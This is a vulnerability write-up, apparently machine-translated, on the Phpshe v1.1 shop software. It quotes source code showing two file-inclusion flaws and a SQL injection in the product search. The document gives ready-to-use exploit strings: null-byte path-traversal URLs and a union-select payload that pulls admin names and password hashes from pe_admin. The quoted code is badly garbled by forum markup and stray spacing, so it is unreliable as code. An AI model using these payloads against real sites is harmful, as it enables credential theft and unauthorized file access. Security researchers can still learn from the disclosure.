Phpshe v1.1 Multiple File Inclusion and SQL Injection

/*************************************** * ************** // * Phpshe v1.1 Vulnerability/* E-Mail: 681796@qq.com /************************************** *****************/0 × 00 overall approximate parameter transmissionView Source Code print help 1 [font = Verdana, Helvetica, Arial, sans-serif] [size = 12px] 2 [/size] [/font] 3 // common. php 4 if (get_magic_quotes_gpc () {5! Empty ($ _ GET) & extract (pe_trim (pe_stripslashes ($ _ GET), EXTR_PREFIX_ALL, '_ G'); 6! Empty ($ _ POST) & extract (pe_trim (pe_stripslashes ($ _ POST), EXTR_PREFIX_ALL, '_ p'); 7} 8 else {9! Empty ($ _ GET) & extract (pe_trim ($ _ GET), EXTR_PREFIX_ALL, '_ G'); 10! Empty ($ _ POST) & extract (pe_trim ($ _ POST), EXTR_PREFIX_ALL, '_ p'); 11} 12 session_start (); 13! Empty ($ _ SESSION) & extract (pe_trim ($ _ SESSION), EXTR_PREFIX_ALL, '_ s'); 14! Empty ($ _ COOKIE) & extract (pe_trim (pe_stripslashes ($ _ COOKIE), EXTR_PREFIX_ALL, '_ C'); 15 [font = Verdana, Helvetica, Arial, sans-serif] [size = 12px]0 × 01 vulnerability includedView Source Code print help 1 [/size] 2 // homepage file 3 Pe_num ('cart', array ('user _ id' = >$ _ s_user_id): (unserialize ($ _ c_cart_list )? Count (unserialize ($ _ c_cart_list): 0); 4 include ("{$ pe ['path _ root']} module/{$ module}/{$ mod }. php "); // $ mod controllable" chicken ribs "include vulnerability 5 pe_result (); 6?> 7 // starting from line 8 of the common file, 8 url routing configuration 9 $ module = $ mod = $ act = 'index'; 10 $ mod = $ _ POST ['mod']? $ _ POST ['mod']: ($ _ GET ['mod']? $ _ GET ['mod']: $ mod); 11 $ act =$ _ POST ['ac']? $ _ POST ['ac']: ($ _ GET ['ac']? $ _ GET ['ac']: $ act); 12 $ id = $ _ POST ['id']? $ _ POST ['id']: ($ _ GET ['id']? $ _ GET ['id']: $ id); 13 // exp: [url] http: // 127.0.0.1/phpshe_v1.1/index. php? Mod =.../../robots.txt % 00 [/url] 14 [p = 30, 2, left]0 × 02 search InjectionView Source Code print help 1[/P] [p = 30, 2, left] // product. php file 2 case 'list':   3 $category_id = intval($id);   4 $info = $db->pe_select('category', array('category_id'=>$category_id));   5 // search 6 $sqlwhere = " and `product_state` = 1";   7 pe_lead('hook/category.hook.php');   8 if ($category_id) {   9 where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";   10 }   11 $ _ g_keyword & $ sqlwhere. = "and 'product _ name' like '% {$ _ g_keyword} %'"; // The keyword variable is not filtered out by valid SQL statements. 12 if ($_g_orderby) {   13 $orderby = explode('_', $_g_orderby);   14 $sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";   15 }   16 else {   17 $sqlwhere .= " order by `product_id` desc";   18 }   19 $info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));   20 // ranking 21 $product_hotlist = product_hotlist();   22 // current path 23 $nowpath = category_path($category_id);   24 $seo = pe_seo($info['category_name']);   25 include(pe_tpl('product_list.html'));   26 // follow up the selectall function library 27 public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())   28 {   29 // Processing Condition Statement 30 $sqlwhere = $this->_dowhere($where);   31 return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);   32 }   33 //exp   34 product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1   35 [/p][p=30, 2, left][size=12px] 0 × 03 vulnerability 2View Source Code print help 1[/p][p=30, 2, left]//order.php[/p][p=30, 2, left]case 'pay':[/p][p=30, 2, left]   2 $order_id = pe_dbhold($_g_id);[/p][p=30, 2, left]   3 $cache_payway = cache::get('payway');[/p][p=30, 2, left]   4 foreach($cache_payway as $k => $v) {[/p][p=30, 2, left]   5 $cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);[/p][p=30, 2, left]   6 if ($k == 'bank') {[/p][p=30, 2, left]   7 $cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);[/p][p=30, 2, left]   8 }[/p][p=30, 2, left]   9 }[/p][p=30, 2, left]   10 $order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));[/p][p=30, 2, left]   11! $ Order ['order _ id'] & pe_error ('order number error... '); [/p] [p = 30, 2, left] 12 if (isset($_p_pesubmit)) {[/p][p=30, 2, left]   13 if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {[/p][p=30, 2, left]   14 $info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));[/p][p=30, 2, left]   15 foreach ($info_list as $v) {[/p][p=30, 2, left]   16 $order['order_name'] .= "{$v['product_name']};";   17 [/p][p=30, 2, left]   18 }[/p][p=30, 2, left]   19 echo 'the payment website is being connected for you. Please wait... '; [/p] [p = 30, 2, left] 20 include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");[/p][p=30, 2, left]   21} // when everything is ready, you can perform "chicken ribs include" [/p] [p = 30, 2, left] 22 else {[/p][p=30, 2, left]   23 pe_error ('payment error... '); [/p] [p = 30, 2, left] 24 }[/p][p=30, 2, left]   25 }[/p][p=30, 2, left]   26 $ seo = pe_seo ('select payment method'); [/p] [p = 30, 2, left] 27 include(pe_tpl('order_pay.html'));[/p][p=30, 2, left]   28 break;[/p][p=30, 2, left]}[/p][p=30, 2, left]//exp：[/p][p=30, 2, left]//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001[/p][p=30, 2, left]//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98